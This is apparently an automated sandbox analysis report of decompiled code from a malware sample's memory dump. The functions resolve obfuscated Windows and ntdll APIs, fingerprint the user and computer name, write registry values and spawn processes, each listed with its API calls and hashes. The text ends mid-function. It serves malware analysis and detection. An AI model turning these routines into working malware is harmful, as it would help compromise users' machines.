                                                          					memset( &_v104, 0, 0x40);
                                                          					_t47 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t18 = _t47 + 0x4c0e3e6; // 0x73797325
                                                          					_t68 = E04C03C48(_t18);
                                                          					if(_t68 == 0) {
                                                          						_v8 = 8;
                                                          					} else {
                                                          						_t50 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          						_t19 = _t50 + 0x4c0e747; // 0x6888cef
                                                          						_t20 = _t50 + 0x4c0e0af; // 0x4e52454b
                                                          						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                                          						if(_t71 == 0) {
                                                          							_v8 = 0x7f;
                                                          						} else {
                                                          							_v108 = 0x44;
                                                          							E04C0A62D();
                                                          							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0);
                                                          							_push(1);
                                                          							E04C0A62D();
                                                          							if(_t58 == 0) {
                                                          								_v8 = GetLastError();
                                                          							} else {
                                                          								CloseHandle(_v28);
                                                          								CloseHandle(_v32);
                                                          							}
                                                          						}
                                                          						HeapFree( *0x4c0d238, 0, _t68);
                                                          					}
                                                          				}
                                                          				_t70 = _v16;
                                                          				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                                          				E04C0A734(_t70);
                                                          				goto L12;
                                                          			}


                                                          APIs
                                                            • Part of subcall function 04C0592D: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04C08EBD,?,00000001,?,?,00000000,00000000), ref: 04C05952
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04C05974
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04C0598A
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04C059A0
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04C059B6
                                                            • Part of subcall function 04C0592D: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04C059CC
                                                          • memset.NTDLL ref: 04C08F0B
                                                            • Part of subcall function 04C03C48: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04C08F24,73797325), ref: 04C03C59
                                                            • Part of subcall function 04C03C48: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04C03C73
                                                          • GetModuleHandleA.KERNEL32(4E52454B,06888CEF,73797325), ref: 04C08F41
                                                          • GetProcAddress.KERNEL32(00000000), ref: 04C08F48
                                                          • HeapFree.KERNEL32(00000000,00000000), ref: 04C08FB0
                                                            • Part of subcall function 04C0A62D: GetProcAddress.KERNEL32(36776F57,04C0A2D4), ref: 04C0A648
                                                          • CloseHandle.KERNEL32(00000000,00000001), ref: 04C08F8D
                                                          • CloseHandle.KERNEL32(?), ref: 04C08F92
                                                          • GetLastError.KERNEL32(00000001), ref: 04C08F96
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ErrorFreeHeapLastmemset
                                                          • String ID:
                                                          • API String ID: 3075724336-0
                                                          • Opcode ID: 6bc76dfe6927423a548ac19558c6ddb3c4b0588d3584e7a7a6c9672fc79376bc
                                                          • Instruction ID: 25abca832b90584cccd6d29ab0bba828fc000d5e550adb2c1770afb5351d719a
                                                          • Opcode Fuzzy Hash: 6bc76dfe6927423a548ac19558c6ddb3c4b0588d3584e7a7a6c9672fc79376bc
                                                          • Instruction Fuzzy Hash: 103152B6900208BFDB10AFE4CC88E9EBBBEEF04358F058565E606A7150D735AE44DB60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 63%
                                                          			E04C01BB6(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t9;
                                                          				intOrPtr _t13;
                                                          				char* _t28;
                                                          				void* _t33;
                                                          				void* _t34;
                                                          				char* _t36;
                                                          				intOrPtr* _t40;
                                                          				char* _t41;
                                                          				char* _t42;
                                                          				char* _t43;
                                                          
                                                          				_t34 = __edx;
                                                          				_push(__ecx);
                                                          				_t9 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          				_t1 = _t9 + 0x4c0e62c; // 0x253d7325
                                                          				_t36 = 0;
                                                          				_t28 = E04C0173D(__ecx, _t1);
                                                          				if(_t28 != 0) {
                                                          					_t40 = __imp__;
                                                          					_t13 =  *_t40(_t28);
                                                          					_v8 = _t13;
                                                          					_t41 = E04C0A71F(_v8 +  *_t40(_a4) + 1);
                                                          					if(_t41 != 0) {
                                                          						strcpy(_t41, _t28);
                                                          						_pop(_t33);
                                                          						__imp__(_t41, _a4);
                                                          						_t36 = E04C064EF(_t34, _t41, _a8);
                                                          						E04C0A734(_t41);
                                                          						_t42 = E04C06467(StrTrimA(_t36, "="), _t36);
                                                          						if(_t42 != 0) {
                                                          							E04C0A734(_t36);
                                                          							_t36 = _t42;
                                                          						}
                                                          						_t43 = E04C017E5(_t36, _t33);
                                                          						if(_t43 != 0) {
                                                          							E04C0A734(_t36);
                                                          							_t36 = _t43;
                                                          						}
                                                          					}
                                                          					E04C0A734(_t28);
                                                          				}
                                                          				return _t36;
                                                          			}















                                                          APIs
                                                            • Part of subcall function 04C0173D: lstrlen.KERNEL32(00000000,00000000,00000000,7742C740,?,?,?,04C01BD0,253D7325,00000000,00000000,7742C740,?,?,04C020C2,?), ref: 04C017A4
                                                            • Part of subcall function 04C0173D: sprintf.NTDLL ref: 04C017C5
                                                          • lstrlen.KERNEL32(00000000,253D7325,00000000,00000000,7742C740,?,?,04C020C2,?,068895B0), ref: 04C01BE1
                                                          • lstrlen.KERNEL32(?,?,?,04C020C2,?,068895B0), ref: 04C01BE9
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • strcpy.NTDLL ref: 04C01C00
                                                          • lstrcat.KERNEL32(00000000,?), ref: 04C01C0B
                                                            • Part of subcall function 04C064EF: lstrlen.KERNEL32(?,?,?,?,00000001,00000000,00000000,?,04C01C1A,00000000,?,?,?,04C020C2,?,068895B0), ref: 04C06506
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,04C020C2,?,068895B0), ref: 04C01C28
                                                            • Part of subcall function 04C06467: lstrlen.KERNEL32(?,00000000,00000000,00000000,?,04C01C34,00000000,?,?,04C020C2,?,068895B0), ref: 04C06471
                                                            • Part of subcall function 04C06467: _snprintf.NTDLL ref: 04C064CF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                                                          • String ID: =
                                                          • API String ID: 2864389247-1428090586
                                                          • Opcode ID: 0a89939afd5821cc990dd96552b123b4c61de121218a7ccd4ec10b6e8cd94586
                                                          • Instruction ID: 03f64e3417ec9133a4db6aa4a062e1183675ff9844f7cff9efabc5d81b658987
                                                          • Opcode Fuzzy Hash: 0a89939afd5821cc990dd96552b123b4c61de121218a7ccd4ec10b6e8cd94586
                                                          • Instruction Fuzzy Hash: 9B114C3B501224779716BBF89C84C7F7AAFCE4576830AC115F60097180DE39FD42A7A0
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          APIs
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04C068EB
                                                          • SysAllocString.OLEAUT32(0070006F), ref: 04C068FF
                                                          • SysAllocString.OLEAUT32(00000000), ref: 04C06911
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C06979
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C06988
                                                          • SysFreeString.OLEAUT32(00000000), ref: 04C06993
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: String$AllocFree
                                                          • String ID:
                                                          • API String ID: 344208780-0
                                                          • Opcode ID: c2f333163f3c0d973cc8be8a8dc653f8b1bdbe1da976334666a38688c0cb021d
                                                          • Instruction ID: 027d71db5fe3fe6c7f2544a24f77e2a2e4b625f13f975a98639eacb7351b4770
                                                          • Opcode Fuzzy Hash: c2f333163f3c0d973cc8be8a8dc653f8b1bdbe1da976334666a38688c0cb021d
                                                          • Instruction Fuzzy Hash: F7415136A00609AFDF01DFBCD84469EB7BAEF49300F158425E914EB260DA71EE15CB91
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04C0592D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
                                                          				intOrPtr _v8;
                                                          				intOrPtr _t23;
                                                          				intOrPtr _t26;
                                                          				_Unknown_base(*)()* _t28;
                                                          				intOrPtr _t30;
                                                          				_Unknown_base(*)()* _t32;
                                                          				intOrPtr _t33;
                                                          				_Unknown_base(*)()* _t35;
                                                          				intOrPtr _t36;
                                                          				_Unknown_base(*)()* _t38;
                                                          				intOrPtr _t39;
                                                          				_Unknown_base(*)()* _t41;
                                                          				intOrPtr _t44;
                                                          				struct HINSTANCE__* _t48;
                                                          				intOrPtr _t54;
                                                          
                                                          				_t54 = E04C0A71F(0x20);
                                                          				if(_t54 == 0) {
                                                          					_v8 = 8;
                                                          				} else {
                                                          					_t23 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t1 = _t23 + 0x4c0e11a; // 0x4c44544e
                                                          					_t48 = GetModuleHandleA(_t1);
                                                          					_t26 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          					_t2 = _t26 + 0x4c0e769; // 0x7243775a
                                                          					_v8 = 0x7f;
                                                          					_t28 = GetProcAddress(_t48, _t2);
                                                          					 *(_t54 + 0xc) = _t28;
                                                          					if(_t28 == 0) {
                                                          						L8:
                                                          						E04C0A734(_t54);
                                                          					} else {
                                                          						_t30 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          						_t5 = _t30 + 0x4c0e756; // 0x614d775a
                                                          						_t32 = GetProcAddress(_t48, _t5);
                                                          						 *(_t54 + 0x10) = _t32;
                                                          						if(_t32 == 0) {
                                                          							goto L8;
                                                          						} else {
                                                          							_t33 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          							_t7 = _t33 + 0x4c0e40b; // 0x6e55775a
                                                          							_t35 = GetProcAddress(_t48, _t7);
                                                          							 *(_t54 + 0x14) = _t35;
                                                          							if(_t35 == 0) {
                                                          								goto L8;
                                                          							} else {
                                                          								_t36 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          								_t9 = _t36 + 0x4c0e4d2; // 0x4e6c7452
                                                          								_t38 = GetProcAddress(_t48, _t9);
                                                          								 *(_t54 + 0x18) = _t38;
                                                          								if(_t38 == 0) {
                                                          									goto L8;
                                                          								} else {
                                                          									_t39 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          									_t11 = _t39 + 0x4c0e779; // 0x6c43775a
                                                          									_t41 = GetProcAddress(_t48, _t11);
                                                          									 *(_t54 + 0x1c) = _t41;
                                                          									if(_t41 == 0) {
                                                          										goto L8;
                                                          									} else {
                                                          										 *((intOrPtr*)(_t54 + 4)) = _a4;
                                                          										 *((intOrPtr*)(_t54 + 8)) = 0x40;
                                                          										_t44 = E04C06604(_t54, _a8);
                                                          										_v8 = _t44;
                                                          										if(_t44 != 0) {
                                                          											goto L8;
                                                          										} else {
                                                          											 *_a12 = _t54;
                                                          										}
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v8;
                                                          			}



















                                                          APIs
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04C08EBD,?,00000001,?,?,00000000,00000000), ref: 04C05952
                                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04C05974
                                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04C0598A
                                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04C059A0
                                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04C059B6
                                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04C059CC
                                                            • Part of subcall function 04C06604: memset.NTDLL ref: 04C06683
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                                          • String ID:
                                                          • API String ID: 1886625739-0
                                                          • Opcode ID: 0976aab3c0cd7544d31268296fceb7176eaec25b7fc8802c063cceaae1936ea7
                                                          • Instruction ID: 7b0207727372b97a8935ee5ee7f9ccd26351e39026bcc43abf8840deec4fb20a
                                                          • Opcode Fuzzy Hash: 0976aab3c0cd7544d31268296fceb7176eaec25b7fc8802c063cceaae1936ea7
                                                          • Instruction Fuzzy Hash: 532160B560070AAFE710DFADC884E6AB7FDEF043047028565E54AC7261E774EE458F60
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 88%
                                                          			E04C0853F(void* __ecx, char* _a8, char _a16, intOrPtr* _a20, char _a24) {
                                                          				signed int _v8;
                                                          				char _v12;
                                                          				signed int* _v16;
                                                          				char _v284;
                                                          				void* __esi;
                                                          				char* _t59;
                                                          				intOrPtr* _t60;
                                                          				intOrPtr _t64;
                                                          				char _t65;
                                                          				intOrPtr _t68;
                                                          				intOrPtr _t69;
                                                          				intOrPtr _t71;
                                                          				void* _t73;
                                                          				signed int _t81;
                                                          				void* _t91;
                                                          				void* _t92;
                                                          				char _t98;
                                                          				signed int* _t100;
                                                          				intOrPtr* _t101;
                                                          				void* _t102;
                                                          
                                                          				_t92 = __ecx;
                                                          				_v8 = _v8 & 0x00000000;
                                                          				_t98 = _a16;
                                                          				if(_t98 == 0) {
                                                          					__imp__( &_v284,  *0x4c0d33c);
                                                          					_t91 = 0x80000002;
                                                          					L6:
                                                          					_t59 = E04C09070( &_v284,  &_v284);
                                                          					_a8 = _t59;
                                                          					if(_t59 == 0) {
                                                          						_v8 = 8;
                                                          						L29:
                                                          						_t60 = _a20;
                                                          						if(_t60 != 0) {
                                                          							 *_t60 =  *_t60 + 1;
                                                          						}
                                                          						return _v8;
                                                          					}
                                                          					_t101 = _a24;
                                                          					if(E04C06E98(_t92, _t97, _t101, _t91, _t59) != 0) {
                                                          						L27:
                                                          						E04C0A734(_a8);
                                                          						goto L29;
                                                          					}
                                                          					_t64 =  *0x4c0d278; // 0x6889a98
                                                          					_t16 = _t64 + 0xc; // 0x6889b66
                                                          					_t65 = E04C09070(_t64,  *_t16);
                                                          					_a24 = _t65;
                                                          					if(_t65 == 0) {
                                                          						L14:
                                                          						_t29 = _t101 + 0x14; // 0x102
                                                          						_t33 = _t101 + 0x10; // 0x3d04c0c0
                                                          						if(E04C022F1(_t97,  *_t33, _t91, _a8,  *0x4c0d334,  *((intOrPtr*)( *_t29 + 0x28)),  *((intOrPtr*)( *_t29 + 0x2c))) == 0) {
                                                          							_t68 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          							if(_t98 == 0) {
                                                          								_t35 = _t68 + 0x4c0ea3f; // 0x4d4c4b48
                                                          								_t69 = _t35;
                                                          							} else {
                                                          								_t34 = _t68 + 0x4c0e8e7; // 0x55434b48
                                                          								_t69 = _t34;
                                                          							}
                                                          							if(E04C06C38(_t69,  *0x4c0d334,  *0x4c0d338,  &_a24,  &_a16) == 0) {
                                                          								if(_t98 == 0) {
                                                          									_t71 =  *0x4c0d2a8; // 0x1c7a5a8
                                                          									_t44 = _t71 + 0x4c0e846; // 0x74666f53
                                                          									_t73 = E04C09070(_t44, _t44);
                                                          									_t99 = _t73;
                                                          									if(_t73 == 0) {
                                                          										_v8 = 8;
                                                          									} else {
                                                          										_t47 = _t101 + 0x10; // 0x3d04c0c0
                                                          										E04C05D7D( *_t47, _t91, _a8,  *0x4c0d338, _a24);
                                                          										_t49 = _t101 + 0x10; // 0x3d04c0c0
                                                          										E04C05D7D( *_t49, _t91, _t99,  *0x4c0d330, _a16);
                                                          										E04C0A734(_t99);
                                                          									}
                                                          								} else {
                                                          									_t40 = _t101 + 0x10; // 0x3d04c0c0
                                                          									E04C05D7D( *_t40, _t91, _a8,  *0x4c0d338, _a24);
                                                          									_t43 = _t101 + 0x10; // 0x3d04c0c0
                                                          									E04C05D7D( *_t43, _t91, _a8,  *0x4c0d330, _a16);
                                                          								}
                                                          								if( *_t101 != 0) {
                                                          									E04C0A734(_a24);
                                                          								} else {
                                                          									 *_t101 = _a16;
                                                          								}
                                                          							}
                                                          						}
                                                          						goto L27;
                                                          					}
                                                          					_t21 = _t101 + 0x10; // 0x3d04c0c0
                                                          					_t81 = E04C08BC1( *_t21, _t91, _a8, _t65,  &_v16,  &_v12);
                                                          					if(_t81 == 0) {
                                                          						_t100 = _v16;
                                                          						if(_v12 == 0x28) {
                                                          							 *_t100 =  *_t100 & _t81;
                                                          							_t26 = _t101 + 0x10; // 0x3d04c0c0
                                                          							E04C022F1(_t97,  *_t26, _t91, _a8, _a24, _t100, 0x28);
                                                          						}
                                                          						E04C0A734(_t100);
                                                          						_t98 = _a16;
                                                          					}
                                                          					E04C0A734(_a24);
                                                          					goto L14;
                                                          				}
                                                          				if(_t98 <= 8 || _t98 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
                                                          					goto L29;
                                                          				} else {
                                                          					_t97 = _a8;
                                                          					E04C0A749(_t98, _a8,  &_v284);
                                                          					__imp__(_t102 + _t98 - 0x117,  *0x4c0d33c);
                                                          					 *((char*)(_t102 + _t98 - 0x118)) = 0x5c;
                                                          					_t91 = 0x80000003;
                                                          					goto L6;
                                                          				}
                                                          			}

                                                          APIs
                                                          • StrChrA.SHLWAPI(04C03741,0000005F,00000000,00000000,00000104), ref: 04C08572
                                                          • lstrcpy.KERNEL32(?,?), ref: 04C0859F
                                                            • Part of subcall function 04C09070: lstrlen.KERNEL32(?,00000000,06889A98,00000000,04C08808,06889C76,?,?,?,?,?,63699BC3,00000005,04C0D00C), ref: 04C09077
                                                            • Part of subcall function 04C09070: mbstowcs.NTDLL ref: 04C090A0
                                                            • Part of subcall function 04C09070: memset.NTDLL ref: 04C090B2
                                                            • Part of subcall function 04C05D7D: lstrlenW.KERNEL32(?,?,?,04C08708,3D04C0C0,80000002,04C03741,04C0A513,74666F53,4D4C4B48,04C0A513,?,3D04C0C0,80000002,04C03741,?), ref: 04C05DA2
                                                            • Part of subcall function 04C0A734: HeapFree.KERNEL32(00000000,00000000,04C05637,00000000,?,?,00000000), ref: 04C0A740
                                                          • lstrcpy.KERNEL32(?,00000000), ref: 04C085C1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemset
                                                          • String ID: ($\
                                                          • API String ID: 3924217599-1512714803
                                                          • Opcode ID: 684609e83c4ab6c1cf4875f5553ed6316a4392dd8b060ed1a91cc65e9b187794
                                                          • Instruction ID: 66ce2652e974f9cbd8b04a27e68bd477d713190d15d54d84a2371fe8dc68b791
                                                          • Opcode Fuzzy Hash: 684609e83c4ab6c1cf4875f5553ed6316a4392dd8b060ed1a91cc65e9b187794
                                                          • Instruction Fuzzy Hash: 54515D76100209EFEF21AFA5DD44EAA7BBAEF04344F01C514FA15561A0E739EE65EF20
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04C0A199() {
                                                          				long _v8;
                                                          				long _v12;
                                                          				int _v16;
                                                          				long _t39;
                                                          				long _t43;
                                                          				signed int _t47;
                                                          				short _t51;
                                                          				signed int _t52;
                                                          				int _t56;
                                                          				int _t57;
                                                          				char* _t64;
                                                          				short* _t67;
                                                          
                                                          				_v16 = 0;
                                                          				_v8 = 0;
                                                          				GetUserNameW(0,  &_v8);
                                                          				_t39 = _v8;
                                                          				if(_t39 != 0) {
                                                          					_v12 = _t39;
                                                          					_v8 = 0;
                                                          					GetComputerNameW(0,  &_v8);
                                                          					_t43 = _v8;
                                                          					if(_t43 != 0) {
                                                          						_v12 = _v12 + _t43 + 2;
                                                          						_t64 = E04C0A71F(_v12 + _t43 + 2 << 2);
                                                          						if(_t64 != 0) {
                                                          							_t47 = _v12;
                                                          							_t67 = _t64 + _t47 * 2;
                                                          							_v8 = _t47;
                                                          							if(GetUserNameW(_t67,  &_v8) == 0) {
                                                          								L7:
                                                          								E04C0A734(_t64);
                                                          							} else {
                                                          								_t51 = 0x40;
                                                          								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
                                                          								_t52 = _v8;
                                                          								_v12 = _v12 - _t52;
                                                          								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
                                                          									goto L7;
                                                          								} else {
                                                          									_t56 = _v12 + _v8;
                                                          									_t31 = _t56 + 2; // 0x4c01fd4
                                                          									_v12 = _t56;
                                                          									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
                                                          									_v8 = _t57;
                                                          									if(_t57 == 0) {
                                                          										goto L7;
                                                          									} else {
                                                          										_t64[_t57] = 0;
                                                          										_v16 = _t64;
                                                          									}
                                                          								}
                                                          							}
                                                          						}
                                                          					}
                                                          				}
                                                          				return _v16;
                                                          			}

                                                          APIs
                                                          • GetUserNameW.ADVAPI32(00000000,04C01FD2), ref: 04C0A1AD
                                                          • GetComputerNameW.KERNEL32(00000000,04C01FD2), ref: 04C0A1C9
                                                            • Part of subcall function 04C0A71F: RtlAllocateHeap.NTDLL(00000000,00000000,04C05595), ref: 04C0A72B
                                                          • GetUserNameW.ADVAPI32(00000000,04C01FD2), ref: 04C0A203
                                                          • GetComputerNameW.KERNEL32(04C01FD2,?), ref: 04C0A226
                                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04C01FD2,00000000,04C01FD4,00000000,00000000,?,?,04C01FD2), ref: 04C0A249
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                                          • String ID:
                                                          • API String ID: 3850880919-0
                                                          • Opcode ID: 412ad9cfadb0bd99a07aef3c6e6dd61d682c475793e068aaa7a58f73ef80f54e
                                                          • Instruction ID: e4011a80183e81398d11b1dc0f5342354a28caf6fd08c95766feed0504a7f289
                                                          • Opcode Fuzzy Hash: 412ad9cfadb0bd99a07aef3c6e6dd61d682c475793e068aaa7a58f73ef80f54e
                                                          • Instruction Fuzzy Hash: BD210A76A01208FFDB11DFE8C9849EEBBBDEF54304B1184AAE506E7241E635AB44DB50
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 58%
                                                          			E04C03DE9(void* __eax, intOrPtr _a4, intOrPtr _a8) {
                                                          				void* __esi;
                                                          				long _t10;
                                                          				void* _t18;
                                                          				void* _t22;
                                                          
                                                          				_t9 = __eax;
                                                          				_t22 = __eax;
                                                          				if(_a4 != 0 && E04C05AF1(__eax + 4, _t18, _a4, __eax, __eax + 4) == 0) {
                                                          					L9:
                                                          					return GetLastError();
                                                          				}
                                                          				_t10 = E04C0A81C(_t9, _t18, _t22, _a8);
                                                          				if(_t10 == 0) {
                                                          					ResetEvent( *(_t22 + 0x1c));
                                                          					ResetEvent( *(_t22 + 0x20));
                                                          					_push(0);
                                                          					_push(0);
                                                          					_push(0xffffffff);
                                                          					_push(0);
                                                          					_push( *((intOrPtr*)(_t22 + 0x18)));
                                                          					if( *0x4c0d128() != 0) {
                                                          						SetEvent( *(_t22 + 0x1c));
                                                          						goto L7;
                                                          					} else {
                                                          						_t10 = GetLastError();
                                                          						if(_t10 == 0x3e5) {
                                                          							L7:
                                                          							_t10 = 0;
                                                          						}
                                                          					}
                                                          				}
                                                          				if(_t10 == 0xffffffff) {
                                                          					goto L9;
                                                          				}
                                                          				return _t10;
                                                          			}

                                                          APIs
                                                          • ResetEvent.KERNEL32(?,00000008,?,?,00000102,04C067B8,?,?,00000000,00000000), ref: 04C03E23
                                                          • ResetEvent.KERNEL32(?), ref: 04C03E28
                                                          • GetLastError.KERNEL32 ref: 04C03E40
                                                          • GetLastError.KERNEL32(?,?,00000102,04C067B8,?,?,00000000,00000000), ref: 04C03E5B
                                                            • Part of subcall function 04C05AF1: lstrlen.KERNEL32(00000000,00000008,?,74B04D40,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?,?,00000000), ref: 04C05AFD
                                                            • Part of subcall function 04C05AF1: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04C03E08,?,?,?,?,00000102,04C067B8,?), ref: 04C05B5B
                                                            • Part of subcall function 04C05AF1: lstrcpy.KERNEL32(00000000,00000000), ref: 04C05B6B
                                                          • SetEvent.KERNEL32(?), ref: 04C03E4E
                                                          Memory Dump Source
                                                          • Source File: 00000006.00000002.251948792.0000000004C01000.00000020.00000001.sdmp, Offset: 04C00000, based on PE: true
                                                          • Associated: 00000006.00000002.251933350.0000000004C00000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252201057.0000000004C0C000.00000002.00000001.sdmp
                                                          • Associated: 00000006.00000002.252419706.0000000004C0D000.00000004.00000001.sdmp
                                                          • Associated: 00000006.00000002.252503147.0000000004C0F000.00000002.00000001.sdmp
                                                          Similarity
                                                          • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                                                          • String ID:
                                                          • API String ID: 1449191863-0
                                                          • Opcode ID: 96f2f05402b0c5d133dff7bbcb8ba53ac30d94264870155962f8dccf0435d2fc
                                                          • Instruction ID: 1a35d5de617f57d613d44c6d579e832836ef04c3b9c2fb5cae53df2e8b75fa31
                                                          • Opcode Fuzzy Hash: 96f2f05402b0c5d133dff7bbcb8ba53ac30d94264870155962f8dccf0435d2fc
                                                          • Instruction Fuzzy Hash: 94016D31104341ABDB306F71DC44F1BBBAAEF48B68F118B25F962910F0D721F954EA65
                                                          Uniqueness

                                                          Uniqueness Score: -1.00%

                                                          C-Code - Quality: 100%
                                                          			E04C03E69(intOrPtr _a4) {
                                                          				void* _t2;
                                                          				unsigned int _t4;
                                                          				void* _t5;
                                                          				long _t6;
                                                          				void* _t7;
                                                          				void* _t15;
                                                          
                                                          				_t2 = CreateEventA(0, 1, 0, 0);
                                                          				 *0x4c0d26c = _t2;
                                                          				if(_t2 == 0) {
                                                          					return GetLastError();
                                                          				}
                                                          				_t4 = GetVersion();
                                                          				if(_t4 != 5) {
                                                          					L4:
                                                          					if(_t15 <= 0) {
                                                          						_t5 = 0x32;
                                                          						return _t5;
                                                          					}
                                                          					L5:
                                                          					 *0x4c0d25c = _t4;
                                                          					_t6 = GetCurrentProcessId();
                                                          					 *0x4c0d258 = _t6;
                                                          					 *0x4c0d264 = _a4;
                                                          					_t7 = OpenProcess(0x10047a, 0, _t6);
